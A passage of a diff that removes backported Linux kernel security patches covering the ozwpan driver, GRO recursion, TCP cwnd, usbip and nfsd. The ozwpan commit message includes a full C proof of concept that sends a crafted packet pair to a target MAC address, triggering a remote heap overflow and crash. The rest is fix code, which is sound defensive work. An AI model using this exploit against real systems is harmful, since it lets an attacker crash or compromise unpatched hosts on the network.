@@ -1,220 +0,0 @@ -From 39a4e1c2675ab45cec548a99ad770faa769ee27a Mon Sep 17 00:00:00 2001 -From: "Jason A. Donenfeld" -Date: Mon, 29 May 2017 12:36:54 +0530 -Subject: ozwpan: Use unsigned ints to prevent heap overflow - -[ Upstream commit: b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c ] - -Using signed integers, the subtraction between required_size and offset -could wind up being negative, resulting in a memcpy into a heap buffer -with a negative length, resulting in huge amounts of network-supplied -data being copied into the heap, which could potentially lead to remote -code execution.. This is remotely triggerable with a magic packet. -A PoC which obtains DoS follows below. It requires the ozprotocol.h file -from this module. - -=-=-=-=-=-= - -static int hex2num(char c) -{ - if (c >= '0' && c <= '9') - return c - '0'; - if (c >= 'a' && c <= 'f') - return c - 'a' + 10; - if (c >= 'A' && c <= 'F') - return c - 'A' + 10; - return -1; -} -static int hwaddr_aton(const char *txt, uint8_t *addr) -{ - int i; - for (i = 0; i < 6; i++) { - int a, b; - a = hex2num(*txt++); - if (a < 0) - return -1; - b = hex2num(*txt++); - if (b < 0) - return -1; - *addr++ = (a << 4) | b; - if (i < 5 && *txt++ != ':') - return -1; - } - return 0; -} - -int main(int argc, char *argv[]) -{ - if (argc < 3) { - fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); - return 1; - } - - uint8_t dest_mac[6]; - if (hwaddr_aton(argv[2], dest_mac)) { - fprintf(stderr, "Invalid mac address.\n"); - return 1; - } - - int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); - if (sockfd < 0) { - perror("socket"); - return 1; - } - - struct ifreq if_idx; - int interface_index; - strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); - if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { - perror("SIOCGIFINDEX"); - return 1; - } - interface_index = if_idx.ifr_ifindex; - if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { - perror("SIOCGIFHWADDR"); - return 1; - } - uint8_t *src_mac = (uint8_t 
*)&if_idx.ifr_hwaddr.sa_data; - - struct { - struct ether_header ether_header; - struct oz_hdr oz_hdr; - struct oz_elt oz_elt; - struct oz_elt_connect_req oz_elt_connect_req; - } __packed connect_packet = { - .ether_header = { - .ether_type = htons(OZ_ETHERTYPE), - .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, - .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } - }, - .oz_hdr = { - .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), - .last_pkt_num = 0, - .pkt_num = htole32(0) - }, - .oz_elt = { - .type = OZ_ELT_CONNECT_REQ, - .length = sizeof(struct oz_elt_connect_req) - }, - .oz_elt_connect_req = { - .mode = 0, - .resv1 = {0}, - .pd_info = 0, - .session_id = 0, - .presleep = 35, - .ms_isoc_latency = 0, - .host_vendor = 0, - .keep_alive = 0, - .apps = htole16((1 << OZ_APPID_USB) | 0x1), - .max_len_div16 = 0, - .ms_per_isoc = 0, - .up_audio_buf = 0, - .ms_per_elt = 0 - } - }; - - struct { - struct ether_header ether_header; - struct oz_hdr oz_hdr; - struct oz_elt oz_elt; - struct oz_get_desc_rsp oz_get_desc_rsp; - } __packed pwn_packet = { - .ether_header = { - .ether_type = htons(OZ_ETHERTYPE), - .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, - .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } - }, - .oz_hdr = { - .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), - .last_pkt_num = 0, - .pkt_num = htole32(1) - }, - .oz_elt = { - .type = OZ_ELT_APP_DATA, - .length = sizeof(struct oz_get_desc_rsp) - }, - .oz_get_desc_rsp = { - .app_id = OZ_APPID_USB, - .elt_seq_num = 0, - .type = OZ_GET_DESC_RSP, - .req_id = 0, - .offset = htole16(2), - .total_size = htole16(1), - .rcode = 0, - .data = {0} - } - }; - - struct sockaddr_ll socket_address = { - .sll_ifindex = interface_index, - .sll_halen = ETH_ALEN, - .sll_addr = { dest_mac[0], dest_mac[1], 
dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } - }; - - if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { - perror("sendto"); - return 1; - } - usleep(300000); - if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { - perror("sendto"); - return 1; - } - return 0; -} - -Change-Id: Ibc1a8b7baa06332b2a7fe7135c68faee1bd791d9 -Signed-off-by: Jason A. Donenfeld -Acked-by: Dan Carpenter -Cc: stable -Signed-off-by: Greg Kroah-Hartman -Signed-off-by: Akshaya ---- - drivers/staging/ozwpan/ozhcd.c | 8 ++++---- - drivers/staging/ozwpan/ozusbif.h | 4 ++-- - 2 files changed, 6 insertions(+), 6 deletions(-) - -diff --git a/drivers/staging/ozwpan/ozhcd.c b/drivers/staging/ozwpan/ozhcd.c -index e880452..628e4e2 100644 ---- a/drivers/staging/ozwpan/ozhcd.c -+++ b/drivers/staging/ozwpan/ozhcd.c -@@ -746,8 +746,8 @@ void oz_hcd_pd_reset(void *hpd, void *hport) - /* - * Context: softirq - */ --void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, -- int length, int offset, int total_size) -+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, const u8 *desc, -+ u8 length, u16 offset, u16 total_size) - { - struct oz_port *port = (struct oz_port *)hport; - struct urb *urb; -@@ -759,8 +759,8 @@ void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, const u8 *desc, - if (!urb) - return; - if (status == 0) { -- int copy_len; -- int required_size = urb->transfer_buffer_length; -+ unsigned int copy_len; -+ unsigned int required_size = urb->transfer_buffer_length; - - if (required_size > total_size) - required_size = total_size; -diff --git a/drivers/staging/ozwpan/ozusbif.h b/drivers/staging/ozwpan/ozusbif.h -index 4249fa3..d2a6085 100644 ---- a/drivers/staging/ozwpan/ozusbif.h -+++ b/drivers/staging/ozwpan/ozusbif.h -@@ -29,8 +29,8 @@ void oz_usb_request_heartbeat(void *hpd); - - /* Confirmation 
functions. - */ --void oz_hcd_get_desc_cnf(void *hport, u8 req_id, int status, -- const u8 *desc, int length, int offset, int total_size); -+void oz_hcd_get_desc_cnf(void *hport, u8 req_id, u8 status, -+ const u8 *desc, u8 length, u16 offset, u16 total_size); - void oz_hcd_control_cnf(void *hport, u8 req_id, u8 rcode, - const u8 *data, int data_len); - --- -1.9.1 - diff --git a/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch b/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch deleted file mode 100644 index 413847c5..00000000 --- a/Patches/Linux_CVEs/Untracked/ANY/0003-tunnels-Don-t-apply-GRO-to-multiple-layers-of-encaps.patch +++ /dev/null 
@@ -1,169 +0,0 @@ -From ce7dbf611ba9db087abc984ba1807771fb0c3545 Mon Sep 17 00:00:00 2001 -From: Jesse Gross -Date: Fri, 26 May 2017 10:43:25 +0530 -Subject: tunnels: Don't apply GRO to multiple layers of encapsulation. - -[ Upstream commit: fac8e0f579695a3ecbc4d3cac369139d7f819971] - -When drivers express support for TSO of encapsulated packets, they -only mean that they can do it for one layer of encapsulation. -Supporting additional levels would mean updating, at a minimum, -more IP length fields and they are unaware of this. - -No encapsulation device expresses support for handling offloaded -encapsulated packets, so we won't generate these types of frames -in the transmit path. However, GRO doesn't have a check for -multiple levels of encapsulation and will attempt to build them. - -UDP tunnel GRO actually does prevent this situation but it only -handles multiple UDP tunnels stacked on top of each other. This -generalizes that solution to prevent any kind of tunnel stacking -that would cause problems. 
- -Change-Id: I072ec2fec752795bee66cf5464af48f17c837a7f -Signed-off-by: Jesse Gross -Signed-off-by: Akshaya ---- - include/linux/netdevice.h | 4 ++-- - net/core/dev.c | 2 +- - net/ipv4/af_inet.c | 15 ++++++++++++++- - net/ipv4/gre_offload.c | 5 +++++ - net/ipv4/udp_offload.c | 6 +++--- - net/ipv6/ip6_offload.c | 15 ++++++++++++++- - 6 files changed, 39 insertions(+), 8 deletions(-) - -diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h -index 943a8301..173b250 100644 ---- a/include/linux/netdevice.h -+++ b/include/linux/netdevice.h -@@ -1902,8 +1902,8 @@ struct napi_gro_cb { - /* Used in ipv6_gro_receive() and foo-over-udp */ - u16 proto; - -- /* Used in udp_gro_receive */ -- u8 udp_mark:1; -+ /* Used in tunnel GRO receive */ -+ u8 encap_mark:1; - - /* GRO checksum is valid */ - u8 csum_valid:1; -diff --git a/net/core/dev.c b/net/core/dev.c -index 9d41179..99e2387 100644 ---- a/net/core/dev.c -+++ b/net/core/dev.c -@@ -4116,7 +4116,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff - NAPI_GRO_CB(skb)->same_flow = 0; - NAPI_GRO_CB(skb)->flush = 0; - NAPI_GRO_CB(skb)->free = 0; -- NAPI_GRO_CB(skb)->udp_mark = 0; -+ NAPI_GRO_CB(skb)->encap_mark = 0; - - /* Setup for GRO checksum validation */ - switch (skb->ip_summed) { -diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c -index b39d5ef..5589a7c 100644 ---- a/net/ipv4/af_inet.c -+++ b/net/ipv4/af_inet.c -@@ -1420,6 +1420,19 @@ out: - return pp; - } - -+static struct sk_buff **ipip_gro_receive(struct sk_buff **head, -+ struct sk_buff *skb) -+{ -+ if (NAPI_GRO_CB(skb)->encap_mark) { -+ NAPI_GRO_CB(skb)->flush = 1; -+ return NULL; -+ } -+ -+ NAPI_GRO_CB(skb)->encap_mark = 1; -+ -+ return inet_gro_receive(head, skb); -+} -+ - int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len) - { - if (sk->sk_family == AF_INET) -@@ -1678,7 +1691,7 @@ static struct packet_offload ip_packet_offload __read_mostly = { - static const struct net_offload ipip_offload 
= { - .callbacks = { - .gso_segment = inet_gso_segment, -- .gro_receive = inet_gro_receive, -+ .gro_receive = ipip_gro_receive, - .gro_complete = inet_gro_complete, - }, - }; -diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c -index abc50b4..cc7b082 100644 ---- a/net/ipv4/gre_offload.c -+++ b/net/ipv4/gre_offload.c -@@ -128,6 +128,11 @@ static struct sk_buff **gre_gro_receive(struct sk_buff **head, - struct packet_offload *ptype; - __be16 type; - -+ if (NAPI_GRO_CB(skb)->encap_mark) -+ goto out; -+ -+ NAPI_GRO_CB(skb)->encap_mark = 1; -+ - off = skb_gro_offset(skb); - hlen = off + sizeof(*greh); - greh = skb_gro_header_fast(skb, off); -diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c -index 6480cea..e6d05ae 100644 ---- a/net/ipv4/udp_offload.c -+++ b/net/ipv4/udp_offload.c -@@ -266,14 +266,14 @@ struct sk_buff **udp_gro_receive(struct sk_buff **head, struct sk_buff *skb, - unsigned int off = skb_gro_offset(skb); - int flush = 1; - -- if (NAPI_GRO_CB(skb)->udp_mark || -+ if (NAPI_GRO_CB(skb)->encap_mark || - (skb->ip_summed != CHECKSUM_PARTIAL && - NAPI_GRO_CB(skb)->csum_cnt == 0 && - !NAPI_GRO_CB(skb)->csum_valid)) - goto out; - -- /* mark that this skb passed once through the udp gro layer */ -- NAPI_GRO_CB(skb)->udp_mark = 1; -+ /* mark that this skb passed once through the tunnel gro layer */ -+ NAPI_GRO_CB(skb)->encap_mark = 1; - - rcu_read_lock(); - uo_priv = rcu_dereference(udp_offload_base); -diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c -index dece5c7..dbc528e 100644 ---- a/net/ipv6/ip6_offload.c -+++ b/net/ipv6/ip6_offload.c -@@ -255,6 +255,19 @@ out: - return pp; - } - -+static struct sk_buff **sit_gro_receive(struct sk_buff **head, -+ struct sk_buff *skb) -+{ -+ if (NAPI_GRO_CB(skb)->encap_mark) { -+ NAPI_GRO_CB(skb)->flush = 1; -+ return NULL; -+ } -+ -+ NAPI_GRO_CB(skb)->encap_mark = 1; -+ -+ return ipv6_gro_receive(head, skb); -+} -+ - static int ipv6_gro_complete(struct sk_buff *skb, int nhoff) - { - const struct 
net_offload *ops; -@@ -289,7 +302,7 @@ static struct packet_offload ipv6_packet_offload __read_mostly = { - static const struct net_offload sit_offload = { - .callbacks = { - .gso_segment = ipv6_gso_segment, -- .gro_receive = ipv6_gro_receive, -+ .gro_receive = sit_gro_receive, - .gro_complete = ipv6_gro_complete, - }, - }; --- -1.9.1 - diff --git a/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch b/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch deleted file mode 100644 index a0fb9e84..00000000 --- a/Patches/Linux_CVEs/Untracked/ANY/0004-net-add-recursion-limit-to-GRO.patch +++ /dev/null 
@@ -1,190 +0,0 @@ -From 8a069274d823319273dab097e865faa01bee2451 Mon Sep 17 00:00:00 2001 -From: Sabrina Dubroca -Date: Fri, 26 May 2017 15:25:08 +0530 -Subject: net: add recursion limit to GRO -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -[ Backported upstream commit: fcd91dd449867c6bfe56a81cabba76b829fd05cd] -[ Files without GRO support have not been updated ] - -Currently, GRO can do unlimited recursion through the gro_receive -handlers. This was fixed for tunneling protocols by limiting tunnel GRO -to one level with encap_mark, but both VLAN and TEB still have this -problem. Thus, the kernel is vulnerable to a stack overflow, if we -receive a packet composed entirely of VLAN headers. - -This patch adds a recursion counter to the GRO layer to prevent stack -overflow. When a gro_receive function hits the recursion limit, GRO is -aborted for this skb and it is processed normally. This recursion -counter is put in the GRO CB, but could be turned into a percpu counter -if we run out of space in the CB. - -Thanks to Vladimír Beneš for the initial bug report. - -Change-Id: Iec7b958d843c5d8214a36be8187d03f9e86ef079 -Fixes: CVE-2016-7039 -Fixes: 9b174d88c257 ("net: Add Transparent Ethernet Bridging GRO support.") -Fixes: 66e5133f19e9 ("vlan: Add GRO support for non hardware accelerated vlan") -Signed-off-by: Sabrina Dubroca -Reviewed-by: Jiri Benc -Acked-by: Hannes Frederic Sowa -Acked-by: Tom Herbert -Signed-off-by: David S. 
Miller -Signed-off-by: Akshaya ---- - drivers/net/vxlan.c | 2 +- - include/linux/netdevice.h | 24 ++++++++++++++++++++++++ - net/core/dev.c | 1 + - net/ipv4/af_inet.c | 2 +- - net/ipv4/fou.c | 4 ++-- - net/ipv4/gre_offload.c | 2 +- - net/ipv4/udp_offload.c | 2 +- - net/ipv6/ip6_offload.c | 2 +- - 8 files changed, 32 insertions(+), 7 deletions(-) - -diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c -index 59282dd..d7cdfad 100644 ---- a/drivers/net/vxlan.c -+++ b/drivers/net/vxlan.c -@@ -600,7 +600,7 @@ static struct sk_buff **vxlan_gro_receive(struct sk_buff **head, struct sk_buff - - skb_gro_pull(skb, sizeof(*eh)); /* pull inner eth header */ - skb_gro_postpull_rcsum(skb, eh, sizeof(*eh)); -- pp = ptype->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h -index 173b250..cbcd056 100644 ---- a/include/linux/netdevice.h -+++ b/include/linux/netdevice.h -@@ -1914,6 +1914,11 @@ struct napi_gro_cb { - /* Used in foo-over-udp, set in udp[46]_gro_receive */ - u8 is_ipv6:1; - -+ /* Number of gro_receive callbacks this packet already went through */ -+ u8 recursion_counter:4; -+ -+ /* 1 bit hole */ -+ - /* used to support CHECKSUM_COMPLETE for tunneling protocols */ - __wsum csum; - -@@ -1923,6 +1928,25 @@ struct napi_gro_cb { - - #define NAPI_GRO_CB(skb) ((struct napi_gro_cb *)(skb)->cb) - -+#define GRO_RECURSION_LIMIT 15 -+static inline int gro_recursion_inc_test(struct sk_buff *skb) -+{ -+ return ++NAPI_GRO_CB(skb)->recursion_counter == GRO_RECURSION_LIMIT; -+} -+ -+typedef struct sk_buff **(*gro_receive_t)(struct sk_buff **, struct sk_buff *); -+static inline struct sk_buff **call_gro_receive(gro_receive_t cb, -+ struct sk_buff **head, -+ struct sk_buff *skb) -+{ -+ if (unlikely(gro_recursion_inc_test(skb))) { -+ NAPI_GRO_CB(skb)->flush |= 1; -+ return NULL; -+ } -+ -+ return cb(head, skb); -+} -+ - struct 
packet_type { - __be16 type; /* This is really htons(ether_type). */ - struct net_device *dev; /* NULL is wildcarded here */ -diff --git a/net/core/dev.c b/net/core/dev.c -index 99e2387..836e4f0 100644 ---- a/net/core/dev.c -+++ b/net/core/dev.c -@@ -4117,6 +4117,7 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff - NAPI_GRO_CB(skb)->flush = 0; - NAPI_GRO_CB(skb)->free = 0; - NAPI_GRO_CB(skb)->encap_mark = 0; -+ NAPI_GRO_CB(skb)->recursion_counter = 0; - - /* Setup for GRO checksum validation */ - switch (skb->ip_summed) { -diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c -index 5589a7c..4fc2ca4 100644 ---- a/net/ipv4/af_inet.c -+++ b/net/ipv4/af_inet.c -@@ -1409,7 +1409,7 @@ static struct sk_buff **inet_gro_receive(struct sk_buff **head, - skb_gro_pull(skb, sizeof(*iph)); - skb_set_transport_header(skb, skb_gro_offset(skb)); - -- pp = ops->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c -index 8ce8e82..7b5b280 100644 ---- a/net/ipv4/fou.c -+++ b/net/ipv4/fou.c -@@ -119,7 +119,7 @@ static struct sk_buff **fou_gro_receive(struct sk_buff **head, - if (!ops || !ops->callbacks.gro_receive) - goto out_unlock; - -- pp = ops->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -@@ -220,7 +220,7 @@ static struct sk_buff **gue_gro_receive(struct sk_buff **head, - /* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/ - skb_gro_postpull_rcsum(skb, guehdr, guehlen); - -- pp = ops->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -diff --git a/net/ipv4/gre_offload.c b/net/ipv4/gre_offload.c -index cc7b082..370c057 100644 ---- a/net/ipv4/gre_offload.c -+++ b/net/ipv4/gre_offload.c -@@ -219,7 +219,7 @@ static struct sk_buff 
**gre_gro_receive(struct sk_buff **head, - /* Adjusted NAPI_GRO_CB(skb)->csum after skb_gro_pull()*/ - skb_gro_postpull_rcsum(skb, greh, grehlen); - -- pp = ptype->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ptype->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c -index e6d05ae..f805597 100644 ---- a/net/ipv4/udp_offload.c -+++ b/net/ipv4/udp_offload.c -@@ -306,7 +306,7 @@ unflush: - skb_gro_pull(skb, sizeof(struct udphdr)); /* pull encapsulating udp header */ - skb_gro_postpull_rcsum(skb, uh, sizeof(struct udphdr)); - NAPI_GRO_CB(skb)->proto = uo_priv->offload->ipproto; -- pp = uo_priv->offload->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(uo_priv->offload->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); -diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c -index dbc528e..b10c0c6 100644 ---- a/net/ipv6/ip6_offload.c -+++ b/net/ipv6/ip6_offload.c -@@ -244,7 +244,7 @@ static struct sk_buff **ipv6_gro_receive(struct sk_buff **head, - - skb_gro_postpull_rcsum(skb, iph, nlen); - -- pp = ops->callbacks.gro_receive(head, skb); -+ pp = call_gro_receive(ops->callbacks.gro_receive, head, skb); - - out_unlock: - rcu_read_unlock(); --- -1.9.1 - diff --git a/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch b/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch deleted file mode 100644 index 5843e1f5..00000000 --- a/Patches/Linux_CVEs/Untracked/ANY/0005-tcp-fix-zero-cwnd-in-tcp_cwnd_reduction.patch +++ /dev/null 
@@ -1,67 +0,0 @@
-From e1f31f3f20ab760ebb2425e67385b2c593c35be5 Mon Sep 17 00:00:00 2001
-From: Yuchung Cheng
-Date: Fri, 26 May 2017 15:45:15 +0530
-Subject: tcp: fix zero cwnd in tcp_cwnd_reduction
-
-[ Upstream commit: 8b8a321ff72c785ed5e8b4cf6eda20b35d427390]
-
-Patch 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode
-conditionally") introduced a bug that cwnd may become 0 when both
-inflight and sndcnt are 0 (cwnd = inflight + sndcnt). This may lead
-to a div-by-zero if the connection starts another cwnd reduction
-phase by setting tp->prior_cwnd to the current cwnd (0) in
-tcp_init_cwnd_reduction().
-
-To prevent this we skip PRR operation when nothing is acked or
-sacked. Then cwnd must be positive in all cases as long as ssthresh
-is positive:
-
-1) The proportional reduction mode
- inflight > ssthresh > 0
-
-2) The reduction bound mode
- a) inflight == ssthresh > 0
-
- b) inflight < ssthresh
- sndcnt > 0 since newly_acked_sacked > 0 and inflight < ssthresh
-
-Therefore in all cases inflight and sndcnt can not both be 0.
-We check invalid tp->prior_cwnd to avoid potential div0 bugs.
-
-In reality this bug is triggered only with a sequence of less common
-events. For example, the connection is terminating an ECN-triggered
-cwnd reduction with an inflight 0, then it receives reordered/old
-ACKs or DSACKs from prior transmission (which acks nothing). Or the
-connection is in fast recovery stage that marks everything lost,
-but fails to retransmit due to local issues, then receives data
-packets from other end which acks nothing.
-
-Change-Id: I6edbd82492839ca86515c64ee22828f7582900aa
-Fixes: 3759824da87b ("tcp: PRR uses CRB mode by default and SS mode conditionally")
-Reported-by: Oleksandr Natalenko
-Signed-off-by: Yuchung Cheng
-Signed-off-by: Neal Cardwell
-Signed-off-by: Eric Dumazet
-Signed-off-by: David S. Miller
-Signed-off-by: Akshaya
----
- net/ipv4/tcp_input.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
-index cc7f940..c0be23d 100644
---- a/net/ipv4/tcp_input.c
-+++ b/net/ipv4/tcp_input.c
-@@ -2516,6 +2516,9 @@ static void tcp_cwnd_reduction(struct sock *sk, const int prior_unsacked,
- int newly_acked_sacked = prior_unsacked -
- (tp->packets_out - tp->sacked_out);
-
-+ if (newly_acked_sacked <= 0 || WARN_ON_ONCE(!tp->prior_cwnd))
-+ return;
-+
- tp->prr_delivered += newly_acked_sacked;
- if (tcp_packets_in_flight(tp) > tp->snd_ssthresh) {
- u64 dividend = (u64)tp->snd_ssthresh * tp->prr_delivered +
---
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch b/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch
deleted file mode 100644
index 717e361a..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From bda1fb82d50ddd35354d850456e687da43bcd794 Mon Sep 17 00:00:00 2001
-From: Ignat Korchagin
-Date: Thu, 17 Mar 2016 18:00:29 +0000
-Subject: USB: usbip: fix potential out-of-bounds write
-
-Fix potential out-of-bounds write to urb->transfer_buffer
-usbip handles network communication directly in the kernel. When receiving a
-packet from its peer, usbip code parses headers according to protocol. As
-part of this parsing urb->actual_length is filled. Since the input for
-urb->actual_length comes from the network, it should be treated as untrusted.
-Any entity controlling the network may put any value in the input and the
-preallocated urb->transfer_buffer may not be large enough to hold the data.
-Thus, the malicious entity is able to write arbitrary data to kernel memory.
-
-Signed-off-by: Ignat Korchagin
-Signed-off-by: Greg Kroah-Hartman
-(cherry picked from commit b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb)
-
-Change-Id: I402ca8adef71745a85ba2c51945b99d46509c06e
-Signed-off-by: Akshaya
----
- drivers/usb/usbip/usbip_common.c | 11 +++++++++++
- 1 file changed, 11 insertions(+)
-
-diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
-index facaaf0..e40da77 100644
---- a/drivers/usb/usbip/usbip_common.c
-+++ b/drivers/usb/usbip/usbip_common.c
-@@ -741,6 +741,17 @@ int usbip_recv_xbuff(struct usbip_device *ud, struct urb *urb)
- if (!(size > 0))
- return 0;
-
-+ if (size > urb->transfer_buffer_length) {
-+ /* should not happen, probably malicious packet */
-+ if (ud->side == USBIP_STUB) {
-+ usbip_event_add(ud, SDEV_EVENT_ERROR_TCP);
-+ return 0;
-+ } else {
-+ usbip_event_add(ud, VDEV_EVENT_ERROR_TCP);
-+ return -EPIPE;
-+ }
-+ }
-+
- ret = usbip_recv(ud->tcp_socket, urb->transfer_buffer, size);
- if (ret != size) {
- dev_err(&urb->dev->dev, "recv xbuf, %d\n", ret);
---
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch b/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch
deleted file mode 100644
index 312d0fd2..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From fa3cb34c08bd88c37a9cee301e12d440e7354f4b Mon Sep 17 00:00:00 2001
-From: "J. Bruce Fields"
-Date: Fri, 21 Apr 2017 16:10:18 -0400
-Subject: nfsd: check for oversized NFSv2/v3 arguments
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-A client can append random data to the end of an NFSv2 or NFSv3 RPC call
-without our complaining; we'll just stop parsing at the end of the
-expected data and ignore the rest.
-
-Encoded arguments and replies are stored together in an array of pages,
-and if a call is too large it could leave inadequate space for the
-reply. This is normally OK because NFS RPC's typically have either
-short arguments and long replies (like READ) or long arguments and short
-replies (like WRITE). But a client that sends an incorrectly long reply
-can violate those assumptions. This was observed to cause crashes.
-
-Also, several operations increment rq_next_page in the decode routine
-before checking the argument size, which can leave rq_next_page pointing
-well past the end of the page array, causing trouble later in
-svc_free_pages.
-
-So, following a suggestion from Neil Brown, add a central check to
-enforce our expectation that no NFSv2/v3 call has both a large call and
-a large reply.
-
-As followup we may also want to rewrite the encoding routines to check
-more carefully that they aren't running off the end of the page array.
-
-We may also consider rejecting calls that have any extra garbage
-appended. That would be safer, and within our rights by spec, but given
-the age of our server and the NFS protocol, and the fact that we've
-never enforced this before, we may need to balance that against the
-possibility of breaking some oddball client.
-
-Reported-by: Tuomas Haanpää
-Reported-by: Ari Kauppi
-Cc: stable@vger.kernel.org
-Reviewed-by: NeilBrown
-Signed-off-by: J. Bruce Fields
-(cherry picked from commit e6838a29ecb484c97e4efef9429643b9851fba6e)
-
-Change-Id: I7a049448dff17ffe5f9174fe07cd68495a838d40
-Signed-off-by: Akshaya
----
- fs/nfsd/nfssvc.c | 36 ++++++++++++++++++++++++++++++++++++
- 1 file changed, 36 insertions(+)
-
-diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
-index 752d56b..a89654b 100644
---- a/fs/nfsd/nfssvc.c
-+++ b/fs/nfsd/nfssvc.c
-@@ -646,6 +646,37 @@ static __be32 map_new_errors(u32 vers, __be32 nfserr)
- return nfserr;
- }
-
-+/*
-+ * A write procedure can have a large argument, and a read procedure can
-+ * have a large reply, but no NFSv2 or NFSv3 procedure has argument and
-+ * reply that can both be larger than a page. The xdr code has taken
-+ * advantage of this assumption to be a sloppy about bounds checking in
-+ * some cases. Pending a rewrite of the NFSv2/v3 xdr code to fix that
-+ * problem, we enforce these assumptions here:
-+ */
-+static bool nfs_request_too_big(struct svc_rqst *rqstp,
-+ struct svc_procedure *proc)
-+{
-+ /*
-+ * The ACL code has more careful bounds-checking and is not
-+ * susceptible to this problem:
-+ */
-+ if (rqstp->rq_prog != NFS_PROGRAM)
-+ return false;
-+ /*
-+ * Ditto NFSv4 (which can in theory have argument and reply both
-+ * more than a page):
-+ */
-+ if (rqstp->rq_vers >= 4)
-+ return false;
-+ /* The reply will be small, we're OK: */
-+ if (proc->pc_xdrressize > 0 &&
-+ proc->pc_xdrressize < XDR_QUADLEN(PAGE_SIZE))
-+ return false;
-+
-+ return rqstp->rq_arg.len > PAGE_SIZE;
-+}
-+
- int
- nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
- {
-@@ -658,6 +689,11 @@ nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
- rqstp->rq_vers, rqstp->rq_proc);
- proc = rqstp->rq_procinfo;
-
